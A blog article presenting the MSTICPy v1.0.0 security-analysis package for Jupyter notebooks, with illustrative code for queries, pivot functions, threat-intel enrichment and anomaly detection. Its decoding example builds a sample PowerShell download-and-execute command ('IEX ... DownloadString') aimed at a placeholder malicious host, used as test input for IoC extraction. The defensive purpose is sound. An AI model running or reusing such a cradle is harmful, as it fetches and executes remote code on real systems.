MSTICPy v1.0.0 and Jupyter Notebooks for CyberSec
With the recent release of v1.0.0 of MSTICPy, we thought it was a good time to write an overview article. This is based on an article in the Azure Sentinel Technical Community blog, but since that one focuses on MSTICPy’s use in Azure Sentinel and MSTICPy is ostensibly SIEM-agnostic, we thought it would be good to do another version of it here.
What is MSTICPy?
MSTICPy is a package of Python tools for security analysts to assist them in investigations and threat hunting. It is primarily designed for use in Jupyter notebooks. If you haven’t used notebooks for security analysis before we’ve put together a (completely unbiased) guide on why you should!
The goals of MSTICPy are to:
- Simplify the process of creating and using notebooks for security analysis by providing building-blocks of key functionality.
- Improve the usability of notebooks by reducing the amount of code needed in notebooks.
- Make the functionality open and available to all, to both use and contribute to.
The 1,000-foot view
MSTICPy is organized into several functional areas:
- Data Acquisition — is all about getting security data into the notebook. It includes data providers and pre-built queries that allow easy access to several security data stores including Azure Sentinel, Microsoft Defender, Splunk and Microsoft Graph. There are also modules that deal with saving and retrieving files from Azure blob storage and uploading data to Azure Sentinel and Splunk.
- Data Enrichment — focuses on components such as threat intelligence and geo-location lookups that provide additional context to events found in the data. It also includes Azure APIs to retrieve details about Azure resources such as virtual machines and subscriptions.
- Data Analysis — packages here focus on more advanced data processing: clustering, time series analysis, anomaly identification, base64 decoding and Indicator of Compromise (IoC) pattern extraction. Another component that we include here but really spans all of the first three categories is pivot functions — these give access to many MSTICPy functions via entities (for example, all IP address related functions are accessible as methods of the IpAddress entity class.)
- Visualization — this includes components to visualize data or results of analyses such as: event timelines, process trees, mapping, morph charts, and time series visualization. Also included under this heading are a large number of notebook widgets that help speed up or simplify tasks such as setting query date ranges and picking items from a list. Also included here are a number of browsers for complex data (like the threat intel and alert browsers) or to help you navigate internal functionality (like the query and pivot function browsers).
We’ll cover a lot of the things we just mentioned later in the article.
This article has a companion notebook. This is the source of the examples in the article and you can download and run the notebook for yourself. The notebook has some additional sections that are not covered in the article.
Assuming that you have a blank notebook running what do you do next?
Most of our notebooks include more-or-less identical setup sections at the beginning. These do three things:
- Check the Python and MSTICPy versions and update the latter if needed.
- Import MSTICPy components.
- Load and authenticate a query provider to be able to start querying data.
The following cell includes the first two of these:
If you see warnings in the output from the cell about missing configuration sections, you should check out the Getting Started documentation. Even if you are not running in Azure Sentinel, you may also find these two notebooks useful:
The utils.check_versions() function is really aimed at checking and tweaking the notebook environment in Azure ML notebooks. If you’re running the notebook elsewhere then you can safely ignore this.
The init_notebook function automates a lot of MSTICPy import statements and checks to see that your configuration looks healthy.
The third part of the initialization loads the data provider (which is the interface to query data) and authenticates to your data source. In this example, we’re using the Azure Sentinel data provider.
Assuming you have your configuration set up correctly, this will usually take you through the authentication sequence, including any two-factor authentication required.
Wait! I don’t have a SIEM to query data from
As long as you can get your data into a pandas DataFrame, you can use most of MSTICPy and the examples in the notebook. We have some sample data sets, either “pickled” (load these with pandas pd.read_pickle()) or in CSV format, in these two locations:
You can also obtain a lot of very interesting attack data samples from the Open Threat Research Forge’s brilliant Mordor project. (MSTICPy has a data provider to help you search for and download samples from Mordor.)
Once this data provider is loaded and authenticated, we’re at the stage where we can start doing interesting things!
MSTICPy has many pre-defined queries for Azure Sentinel (as well as for other providers). You can choose to run one of these predefined queries or write your own. This list of queries is usually up-to-date but the code itself is the real authority (since we add new queries frequently). The easiest way to see the available queries is with the query browser. This shows the queries grouped by category and lets you view usage/parameter information for each query.
There is also a command-line equivalent function to the browser — qry_prov.list_queries().
Nearly all queries need time range parameters. You can specify these as parameters to the query function, but who wants to type long date-time strings? It is usually easier to use the QueryTime widget to set your desired time range and just pass it to the query. In the example below we can see how to load the QueryTime widget. You pass the widget itself to the query function, and its start and end values are inserted into the query before it is run.
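As a rough illustration of what “inserted into the query” means, the sketch below fills start and end placeholders in a query template. It is not MSTICPy’s code: the TimeRange class, the build_query helper and the template text are hypothetical stand-ins for the QueryTime widget and a real query function.

```python
from dataclasses import dataclass
from datetime import datetime, timedelta, timezone


@dataclass
class TimeRange:
    """Hypothetical stand-in for a time-range widget: it only holds start and end."""

    start: datetime
    end: datetime


# Hypothetical query template; {start} and {end} are filled in before the query runs.
QUERY_TEMPLATE = (
    "SecurityAlert\n"
    "| where TimeGenerated >= datetime({start})\n"
    "| where TimeGenerated <= datetime({end})"
)


def build_query(template: str, time_range: TimeRange) -> str:
    """Insert the range's start and end (ISO 8601 format) into the template."""
    return template.format(
        start=time_range.start.isoformat(),
        end=time_range.end.isoformat(),
    )


end = datetime(2021, 4, 1, tzinfo=timezone.utc)
time_range = TimeRange(start=end - timedelta(days=1), end=end)
query_text = build_query(QUERY_TEMPLATE, time_range)
print(query_text)
```

Passing one object that carries both values keeps the call site short and makes it easy to reuse the same range across several queries.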
One thing you can see from this screen shot is that the data is returned as a pandas DataFrame. pandas is a package that is extremely popular in the data science community. MSTICPy uses it extensively as a universal data interchange format between different components. We’ll see more examples of DataFrames as we move through the article.
Although there are a lot of built-in queries, there will always be cases where you need something different. There are a couple of approaches:
- Most queries will take an optional parameter add_query_items which allows you to tack on (some might say “inject”!) arbitrary KQL (for Azure Sentinel queries) to the query.
- You can write a query from scratch as a string and just execute it.
These options are shown below in these two examples.
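As a rough sketch of the first option, the snippet below appends extra clauses to a base query string. The with_extra_items helper and the query text are hypothetical and only mimic the idea behind add_query_items; MSTICPy’s own handling may differ.

```python
# Hypothetical base query, standing in for a pre-defined query's text.
BASE_QUERY = "SecurityEvent\n| where EventID == 4688"


def with_extra_items(base_query: str, add_query_items: str = "") -> str:
    """Return base_query with any extra clauses appended on a new line."""
    extra = add_query_items.strip()
    if not extra:
        return base_query
    return f"{base_query}\n{extra}"


full_query = with_extra_items(
    BASE_QUERY,
    add_query_items="| where Computer has 'dc01'\n| take 10",
)
print(full_query)
```

Because the extra text is appended verbatim, this approach is only appropriate for query fragments that you wrote or trust.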
Now that we can get data, let’s do something more interesting with it.
One of the most basic but also most useful visualizations is to project events onto a timeline. You can do this using MSTICPy’s separate Timeline function or, more conveniently, call it directly from a DataFrame using the mp_timeline pandas extension.
MSTICPy makes extensive use of the interactive graphics of Bokeh. These charts can be panned and zoomed. Each event also has a hover-over tool-tip containing summary information about the event (the summary is derived from the source_columns parameter list).
A process tree is another common visualization used when investigating endpoint (host) data.
Like the timeline, the process tree supports panning, zooming, hover details and has an optional data table viewer (you need to specify show_table=True when calling the function).
As mentioned at the start, MSTICPy has a number of special-purpose viewers for things like alerts, where it is often difficult to see the required data when it’s in tabular format.
This example combines both the timeline viewer and the SelectAlert browser.
Data Enrichment with Threat Intelligence, WhoIs and GeoIP
MSTICPy contains many enrichment components for geo-location, ASN/whois, threat intelligence, Azure resource data and others.
This example shows calling a method of the IpAddress entity class to get WhoIs information for an IP address.
Although the whois feature is available as a standalone function, we’ve used a pivot function of the IpAddress class here. To do this we needed to load the Pivot class.
Side note — Pivot functions
If what you want to do is entity-related, there is a good chance that the MSTICPy function will appear as an entity pivot function. Queries, enrichment functions and analysis functions that relate to a particular entity type are all exposed as pivot functions of that entity.
Wait — what is an Entity?
An entity is essentially a “noun” in the CyberSec world — for example: an IP Address, host, URL, account, etc. They are typically things that do stuff or have stuff done to them. Entities will always have one or more properties that identify the entity and might also have additional context properties. For example, an IpAddress entity has its primary Address property and it might also have contextual properties like geo-location or ASN data.
Pivot functions are the “verbs” to the entities’ “nouns”. They perform investigative actions (like data queries) on the entity and return a result. The Host entity class, for example, has data queries that retrieve process or logon events logged for that host. The IpAddress entity has functions to look up its geo-location or query information about the address from threat intelligence providers.
Pivot functions are not statically coded into the entity classes. Instead, the pivot subsystem harvests pivot functions from available queries and components and dynamically adds them to the entities. This gives us a lot of flexibility to add new functions as the features of MSTICPy evolve. It also allows you to use functions from third party libraries or write your own functions and expose them as pivot functions.
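The idea of attaching functions to entity classes at run time can be sketched in a few lines of plain Python. This is an illustration of the general technique only, not the MSTICPy pivot subsystem: the toy IpAddress class, the register_pivot helper and the ip_type function are all hypothetical.

```python
import ipaddress
from typing import Callable


class IpAddress:
    """Toy entity with a single identifying property."""

    def __init__(self, address: str) -> None:
        self.Address = address


def register_pivot(
    entity_cls: type, name: str, func: Callable[[str], dict], attr: str
) -> None:
    """Attach func to entity_cls at run time as a method called `name`.

    The generated method reads the entity's identifying attribute and
    passes it to the wrapped function.
    """

    def pivot(self) -> dict:
        return func(getattr(self, attr))

    pivot.__name__ = name
    pivot.__doc__ = func.__doc__
    setattr(entity_cls, name, pivot)


def ip_type(address: str) -> dict:
    """Classify an address as private or public (stdlib only, no lookups)."""
    ip = ipaddress.ip_address(address)
    return {"address": address, "version": ip.version, "private": ip.is_private}


# The entity class gains the method only after registration.
register_pivot(IpAddress, "ip_type", ip_type, attr="Address")
result = IpAddress("10.1.2.3").ip_type()
print(result)
```

Keeping the function separate from the class means the same function can still be called on its own, and new functions can be added without editing the entity definition.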
How do you find what pivot functions (and even what entities) are available? The easiest way to view the entities, their pivot functions and the help associated with each function is to use the Pivot browser (similar to the query browser shown earlier).
Being grouped with their respective entities makes the pivot functions easy to find (compared with hunting through documents to find the right module or function to import). Pivot functions are grouped into related sub-containers of the entity, so all AzureSentinel queries have the form entity.AzureSentinel.query_function().
Another advantage of pivot functions (over standalone functions) is that they have a homogeneous interface. They will all accept inputs as single values, lists of values or values stored in DataFrames. They also always return their results as DataFrames.
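A minimal sketch of such a uniform interface is shown here, using only the standard library. A list of row dictionaries stands in for a DataFrame, and DataFrame input is not covered. The uniform_input decorator and the domain_parts function are hypothetical names, not part of MSTICPy.

```python
from functools import wraps
from typing import Callable, Iterable, List, Union


def uniform_input(func: Callable[[str], dict]) -> Callable[..., List[dict]]:
    """Wrap a single-value function so it accepts one value or an iterable of values.

    The wrapper always returns a list of row dictionaries, which is the
    stdlib stand-in used here for a DataFrame result.
    """

    @wraps(func)
    def wrapper(values: Union[str, Iterable[str]]) -> List[dict]:
        # A lone string is itself iterable, so treat it explicitly as one value.
        if isinstance(values, str):
            values = [values]
        return [func(value) for value in values]

    return wrapper


@uniform_input
def domain_parts(domain: str) -> dict:
    """Hypothetical enrichment: split a domain into its labels."""
    labels = domain.split(".")
    return {"domain": domain, "tld": labels[-1], "label_count": len(labels)}


single = domain_parts("example.com")
many = domain_parts(["example.com", "mail.example.org"])
print(single)
print(many)
```

Because the return shape is the same for one value or many, the caller never needs to special-case the result.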
Back to Enrichment
A nice side benefit of pivot functions using DataFrames as both input and output is that we can chain several together in a pandas pipeline. Here we’re taking IP addresses from an alert and successively getting WhoIs data and geo-location data (after which we insert an mp_pivot.display function to peek at the intermediate data in the pipeline). Finally, we’re querying multiple Threat Intelligence providers to see if they have any data about the IP address. At each stage we’re asking for the newly obtained data to be joined to the output of the previous stage (via the join parameter), although joining is optional.
We then display the results output by this pipeline (the last data tagged on is from the threat intel providers) in another special-purpose viewer, the TI browser. We’ll see this again a little later.
Here is an example of a more traditional “pipeline” — i.e. just good old Python function calls — rather than using pandas. It’s a bit clunkier but you can see more clearly what is going on in each step. Even if your plan is to produce a pipeline like the previous example, it’s a good idea to start with individual function calls and temporary variables until you get bugs ironed out.
The sequence below stitches together the base64 decoder, IoC pattern extractor and threat intel lookup that we saw previously. It’s taking an obfuscated PowerShell command line and extracting and examining the contents found in the decoded string. Finally, it displays the TI results in the TI browser.
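The decode-then-extract part of that sequence can be approximated with the standard library alone, as in the sketch below. It does not use MSTICPy’s decoder or IoC extractor: the regular expressions are deliberately simple, the sample command is made up, and the threat intel lookup is left out because it needs a live provider.

```python
import base64
import re

# Build a sample obfuscated command so the example is reproducible.
# PowerShell's -EncodedCommand expects base64 over UTF-16LE text.
script = (
    "IEX (New-Object Net.WebClient).DownloadString("
    "'http://malicious.example.com/payload.ps1'); ping 203.0.113.7"
)
encoded = base64.b64encode(script.encode("utf-16-le")).decode("ascii")
command_line = f"powershell.exe -NoProfile -EncodedCommand {encoded}"

# Deliberately simple patterns; real IoC extractors use stricter expressions.
B64_PATTERN = re.compile(r"[A-Za-z0-9+/]{20,}={0,2}")
IOC_PATTERNS = {
    "url": re.compile(r"https?://[^\s'\"]+"),
    "ipv4": re.compile(r"\b(?:\d{1,3}\.){3}\d{1,3}\b"),
}


def decode_b64_segments(text: str) -> list:
    """Return decoded text for each base64-looking run that decodes as UTF-16LE."""
    decoded = []
    for match in B64_PATTERN.finditer(text):
        try:
            raw = base64.b64decode(match.group(), validate=True)
            decoded.append(raw.decode("utf-16-le"))
        except (ValueError, UnicodeDecodeError):
            # Not valid base64 or not UTF-16LE text: skip this candidate.
            continue
    return decoded


def extract_iocs(text: str) -> dict:
    """Return the unique matches for each IoC pattern found in text."""
    return {
        name: sorted(set(pattern.findall(text)))
        for name, pattern in IOC_PATTERNS.items()
    }


decoded_segments = decode_b64_segments(command_line)
iocs = extract_iocs(decoded_segments[0])
print(decoded_segments[0])
print(iocs)
```

Keeping each step as a separate function with its own intermediate variable makes it easy to inspect the output of one stage before feeding it to the next.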
Using advanced analysis (aka simple machine learning)
MSTICPy has several more-advanced analysis components that help with identifying anomalous patterns in large data sets.
First we’ll show the time series decomposition and visualization component. This works by determining regular patterns of bulk events (think of outbound network byte counts or logon failures) and then identifies outliers to this pattern with a simple statistical calculation.
You can see the daily cadence of the network traffic and the presence of two outlying events on 7–11 (the date, not the store).
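To make the “regular pattern plus outliers” idea concrete, here is a much simpler stand-in for a full time series decomposition. It assumes hourly data with a daily cycle, uses the per-hour median as the seasonal baseline, and flags residuals with a robust z-score based on the median absolute deviation. The data is synthetic, and the function name and threshold are illustrative choices rather than anything taken from MSTICPy.

```python
import math
import statistics

HOURS_PER_DAY = 24
DAYS = 7

# Synthetic hourly byte counts: a daily cycle plus small deterministic jitter.
values = [
    100
    + 50 * math.sin(2 * math.pi * (i % HOURS_PER_DAY) / HOURS_PER_DAY)
    + (i * 7) % 5
    - 2
    for i in range(HOURS_PER_DAY * DAYS)
]
# Inject two artificial spikes to stand in for unusual traffic.
for spike_index in (60, 130):
    values[spike_index] += 500


def seasonal_outliers(series, period, threshold=3.5):
    """Return indices whose deviation from the per-slot median is unusually large."""
    # Seasonal baseline: the median of all observations in the same slot of the cycle.
    baseline = [statistics.median(series[slot::period]) for slot in range(period)]
    residuals = [value - baseline[i % period] for i, value in enumerate(series)]
    # Robust spread estimate: median absolute deviation (MAD) of the residuals.
    centre = statistics.median(residuals)
    mad = statistics.median(abs(r - centre) for r in residuals)
    scale = 1.4826 * mad or 1.0  # avoid dividing by zero on perfectly regular data
    return [i for i, r in enumerate(residuals) if abs(r - centre) / scale > threshold]


anomalies = seasonal_outliers(values, HOURS_PER_DAY)
print(anomalies)
```

Medians are used for both the baseline and the spread so that the spikes themselves do not distort the pattern they are measured against.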
Where the data is more complex than bulk counts, we can use another anomaly identification technique based on Markov chains. A Markov chain models the probability of the next event occurring given the events that came immediately before it.
Here we are using it to analyze Office 365 data. We will build a model to determine the probability of specific sequences of actions and then identify rare sequences that deviate from this base probability. Office activity data is first grouped into sessions based on user name and source IP address. The probability of a given sequence of actions within a session is measured during the creation of the model. For example, it would be very common to see actions like opening emails, reading a few files, etc. An atypical session (one that reads hundreds of files or performs unusual actions like setting a mail forwarding rule or delegating control of a mailbox) would be much less probable and so would be detectable.
(the full code for this is given in the notebook)
There is clearly one session that stands out from the crowd in terms of the unusual actions seen in that session. We can use the rarity score (the inverse of the probability) to quickly filter out the other sessions and see what was happening. In this case, the event revealed a series of unexpected privilege assignment actions.
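The session-scoring idea can be sketched with a first-order Markov chain in plain Python. This is a simplified illustration under stated assumptions, not MSTICPy’s model: the sessions are invented, every session being scored was also used to build the model (so no smoothing for unseen transitions is needed), and rarity is taken directly as the inverse of the session probability.

```python
import math
from collections import Counter, defaultdict

START, END = "<start>", "<end>"

# Invented sessions: each is the ordered list of actions for one user/IP pair.
sessions = (
    [["MailItemsAccessed", "FileAccessed"]] * 20
    + [["FileAccessed", "FileAccessed"]] * 10
    + [["MailItemsAccessed", "Set-Mailbox", "Add-MailboxPermission"]]
)


def fit_transitions(all_sessions):
    """Estimate first-order transition probabilities P(next action | current action)."""
    counts = defaultdict(Counter)
    for session in all_sessions:
        steps = [START, *session, END]
        for current, following in zip(steps, steps[1:]):
            counts[current][following] += 1
    return {
        current: {nxt: n / sum(followers.values()) for nxt, n in followers.items()}
        for current, followers in counts.items()
    }


def rarity(session, transitions):
    """Inverse of the session probability under the model (higher means rarer)."""
    steps = [START, *session, END]
    log_prob = sum(math.log(transitions[a][b]) for a, b in zip(steps, steps[1:]))
    return math.exp(-log_prob)


transitions = fit_transitions(sessions)
scores = [rarity(session, transitions) for session in sessions]
rarest_index = max(range(len(sessions)), key=scores.__getitem__)
print(sessions[rarest_index], round(scores[rarest_index], 2))
```

Summing log probabilities rather than multiplying raw probabilities avoids numeric underflow on long sessions. A fuller version would also need to handle transitions that never appeared when the model was built.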
Documentation and Resources
We’ve invested a lot of time in documentation (since nothing is more frustrating than an interesting package that you cannot work out how to use!). Most of this is in the form of user guides for the different components (see msticpy ReadTheDocs), and we also have a set of example notebooks for many components. You can also find a set of more applied notebooks in the Azure-Sentinel-Notebooks repo (although some of these could do with an update or two, which we’re working on). We do also try to document our code well so that even the API documents are often informative enough to work things out (if you find examples where this isn’t the case, please let us know).
Thanks for sticking with me through this marathon article. I hope it has given you a flavor of the power of Jupyter notebooks in CyberSec hunting and investigation tasks and a reasonable overview of many of the capabilities in MSTICPy.
Take-aways and actions.
- The very obvious first action is to go and start playing with notebooks for your CyberSec investigations.
- Second would be to install MSTICPy and kick the tires. We are always looking for feedback on what does and doesn’t work and are always open to requests or suggestions for new features.
- Read the docs.
- If you’re feeling adventurous, consider contributing to MSTICPy. Contributions could be ideas of your own that you think would be helpful to the CyberSec community. If you’re a bit stuck for ideas but love security and Python coding, we have a few ideas of our own and way too few people to implement them.
- File an issue, feature request, create a PR or just poke around the code on our GitHub repo.
- Read a summary of the latest release.
- Follow me (@ianhellen), Pete (@MSSPete) and Ashwin (@ashwinpatil) on Twitter.
- You can also reach us at email@example.com